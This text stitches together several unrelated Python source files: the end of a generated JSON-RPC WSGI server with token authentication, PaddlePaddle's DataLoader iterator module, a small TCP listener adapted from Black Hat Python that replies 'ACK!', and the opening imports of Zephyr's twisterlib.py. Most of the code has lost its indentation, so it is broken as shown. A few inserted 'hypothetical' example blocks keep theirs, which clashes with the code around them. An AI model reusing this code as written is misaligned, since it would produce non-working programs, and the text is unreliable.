body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"msa_muscle but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
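# Hypothetical test sketch (not part of the generated server): start the WSGI
# server in a child process, issue one JSON-RPC call with the '_requests' alias
# imported above, then shut the server down. Without a valid Authorization
# header the call returns a JSON-RPC error, which still serves as a
# connectivity check.
def _example_server_roundtrip():
    port = start_server(newprocess=True)
    try:
        body = {'version': '1.1', 'id': '1',
                'method': 'msa_muscle.build_msa', 'params': [{}]}
        resp = _requests.post('http://localhost:%s' % port,
                              data=json.dumps(body))
        return resp.json()
    finally:
        stop_server()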
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
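# Hypothetical input sketch for process_async_cli (not part of the generated
# code): the input file holds a single JSON-RPC request, for example
#   {"version": "1.1", "id": "1",
#    "method": "msa_muscle.build_msa", "params": [{}]}
# The JSON-RPC response is written to the output file, and the function returns
# 500 if the response carries an 'error' member, 0 otherwise.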
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode, _in_eager_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
# NOTE: fix `terminate called without an active exception`
# If a for loop breaks and the program exits immediately (with no model
# layers processing) after iterating over only the first few batches in
# distributed launch mode, distributed launch will call terminate() to kill
# the main process on each device, but the reader thread is still iterating
# to fill the blocking queue caches. This may cause the thread error
# `terminate called without an active exception`, because terminate is a
# strong signal and `__del__` of DataLoader may not be called, so we keep a
# global link to the last DataLoader instance and call its `__del__` to
# clean up resources.
# NOTE: we cannot simply register `__del__` with CleanupFuncRegistrar,
# because that would keep a link to every DataLoader instance in global
# scope, which would prevent GC from collecting DataLoader instances
# and cause a memory leak.
_loader = None
def _clear_loader():
global _loader
if _loader is not None:
try:
_loader.__del__()
del _loader
except:
pass
CleanupFuncRegistrar.register(_clear_loader)
class _DataLoaderIterBase(object):
"""
    Iterator implementation of DataLoader, which loads and feeds mini-batch
    data according to the settings of the given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
        # to put mini-batch data into self._blocking_queue; mini-batch data
        # will be fetched from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
def _exit_thread_expectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.kill()
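# Hypothetical usage sketch (not part of this module): these iterator classes
# are normally created by iterating a paddle.io.DataLoader. num_workers=0
# selects _DataLoaderIterSingleProcess below, num_workers>0 selects
# _DataLoaderIterMultiProcess. The toy dataset here is an illustration only.
def _example_dataloader_usage():
    from paddle.io import Dataset, DataLoader

    class _RandomDataset(Dataset):
        def __len__(self):
            return 8

        def __getitem__(self, idx):
            image = np.random.random([4]).astype('float32')
            label = np.array([idx]).astype('int64')
            return image, label

    loader = DataLoader(_RandomDataset(), batch_size=2, num_workers=0)
    return [(image.shape, label.shape) for image, label in loader]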
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
    Single-process implementation of DataLoaderIter, loading data from
    the loader's dataset in the main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
        # NOTE: _structure_infos is used to record the data structure of each
        # batch so the batch structure can be restored after reading Tensors
        # from blocking_queue in single-process mode. Since only a single
        # process is used in this mode, we can record the data structures
        # sequentially in a list without recording send and recv indices.
self._structure_infos = []
        # NOTE: len(self._places) batches compose one output iteration,
        # so the blocking_queue below can cache at most one iteration of
        # data here
self._blocking_queue_capacity = 1 * len(self._places)
self._init_thread()
self._shutdown = False
global _loader
_loader = self
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
        # NOTE(zhiqiu): Set the expected place for the new thread to be the same
        # as the parent thread's, which calls platform::SetDeviceId() in C++
        # internally. If we do not set the cuda device id in the new thread,
        # the default cuda device id will be 0, which may cost hundreds of MB
        # of GPU memory on CUDAPlace(0) if calling some cuda APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
indices = next(self._sampler_iter)
                # read data from dataset in mini-batch
                # with paddle.fluid.dygraph.guard(place=paddle.CPUPlace()):
batch = self._dataset_fetcher.fetch(indices,
self._thread_done_event)
except StopIteration:
self._exit_thread_expectedly()
return
if batch is None or self._thread_done_event.is_set(): break
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
if self._thread_done_event.is_set(): break
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if self._thread_done_event.is_set(): break
try:
self._blocking_queue.push(array)
except:
self._exit_thread_expectedly()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
self._exit_thread_expectedly()
def __next__(self):
try:
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
                    # static graph organizes data on multiple devices with a
                    # list; if the place number is 1, there is only 1 device,
                    # so extract the data from the list to be compatible with
                    # dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
            # NOTE: we wait up to 3 seconds for _thread to exit; if the
            # thread does not exit normally, force kill it
for _ in range(3):
if self._thread.is_alive():
time.sleep(1)
else:
break
else:
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def _try_shutdown_all(self):
if not self._shutdown:
try:
# # _blocking_queue in keep order mode holds sub-threads
# # need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
self._blocking_queue = None
# NOTE: blocking queue should be closed firstly for
# blocking queue read may hang and _thread_done_event
# cannot be checked
self._shutdown_thread()
finally:
self._shutdown = True
def __del__(self):
self._try_shutdown_all()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
        # subprocess workers' result queue
self._data_queue = None
        # data fetched from _data_queue will be reordered by _rcvd_idx
        # to keep data order; data whose index does not equal _rcvd_idx
        # will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
        # _outstanding_capacity indices are outstanding at first, and the
        # blocking_queue capacity is also _outstanding_capacity.
        # _outstanding_capacity is chosen so that each indices_queue
        # holds at least 2 indices, and outstanding batches cache
        # output data for at least 2 iterations (note that len(_places)
        # batches are composed as one iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
        # multiprocess worker and indices queue lists are initialized as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
        # events for workers and thread; the thread event is only needed
        # in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# thread event is only need in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all worker as resume iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
        # all flags will be checked in _thread_loop, simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
        # the blocking_queue caches instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
                # _workers_done_event should be set before putting None
                # into indices_queue; workers will exit on reading None from
                # indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _thread_loop(self, legacy_expected_place):
        # NOTE(zhiqiu): Set the expected place for the new thread to be the same
        # as the parent thread's, which calls platform::SetDeviceId() in C++
        # internally. If we do not set the cuda device id in the new thread,
        # the default cuda device id will be 0, which may cost hundreds of MB
        # of GPU memory on CUDAPlace(0) if calling some cuda APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
                            # serializable, and cannot be created in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
            # For IterableDataset, batch indices are generated infinitely
            # for each worker until it raises StopIteration, but a worker
            # raising StopIteration will discard a batch of indices which is
            # counted in _send_idx but will not increase _rcvd_idx, so we check
            # whether the worker is still alive here to skip the discarded
            # batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
                # NOTE: when _rcvd_idx catches up with _send_idx, it means
                # one of the following:
                # 1. all 2 * num_workers batches have been loaded
                #    and stored in _blocking_queue
                # 2. all data has been drained
                # we need to let _thread block at _data_queue.get to avoid
                # occupying the CPU, otherwise it may take CPU time from
                # model running
                # NOTE: in persistent workers mode, do not check data
                # drained here, simply let it go on to _data_queue
                # reading to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
                    # workers; if batches among workers are drained, there
                    # may still be data in the blocking queue
if self._batches_outstanding < len(self._places):
return None
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
                # [ avoid hang ]: the main process may block at _reader.read_next on
                # KeyboardInterrupt, so we make the following tradeoff:
                # 1. get data with a timeout, MP_STATUS_CHECK_INTERVAL(5s) by
                #    default; if KeyboardInterrupt blocks, failed workers will be
                #    checked and a RuntimeError raised to quit DataLoader in the
                #    timeout exception handling.
                # 2. if getting data times out and all workers are alive, continue
                #    to get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
                    # if a worker gets StopIteration, we shut down this worker;
                    # note that the batch indices that triggered StopIteration
                    # are discarded, so the outstanding batch number should be
                    # decreased and more indices should be put for other
                    # workers that may still be working.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
        # In multi-process mode for IterableDataset, _try_put_indices will
        # be called both in the main process (since our implementation has a
        # blocking queue whose reads happen in the main process) and in the
        # reader thread, which may cause the following errors:
        # 1. "ValueError: generator already executing" in next(self._sampler_iter)
        # 2. re-entry when increasing _send_idx
        # add a lock for thread safety; since _try_put_indices is only a
        # lightweight function which is not in the data reading pipeline,
        # this lock has almost no influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
try:
            # _batches_outstanding here records the total number of batches
            # between 'after _try_put_indices' and 'before output data'; this
            # value should be _outstanding_capacity if data is not drained.
            # If _batches_outstanding is less than the number of _places, there
            # is not enough data to generate the next output, so close
            # blocking_queue and set _thread_done_event here; py_reader will
            # raise StopIteration, and workers and indices_queues are ended
            # in the StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
                    # static graph organizes data on multiple devices with a
                    # list; if the place number is 1, there is only 1 device,
                    # so extract the data from the list to be compatible with
                    # dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
simple_tcp_server.py
|
import socket
import threading
# adapted from Black Hat Python
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip, bind_port)
#this is our client handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print "[*] Received %s" % request
#send back a packet
client_socket.send("ACK!")
client_socket.close()
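# hypothetical client sketch (not in the original Black Hat Python example):
# run this from a second Python interpreter while the server loop below is
# running to see the ACK reply
def example_client(target_ip="127.0.0.1", target_port=9999):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((target_ip, target_port))
    client.send("hello from client")
    response = client.recv(4096)
    print "[*] Server replied: %s" % response
    client.close()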
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0], addr[1])
#spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
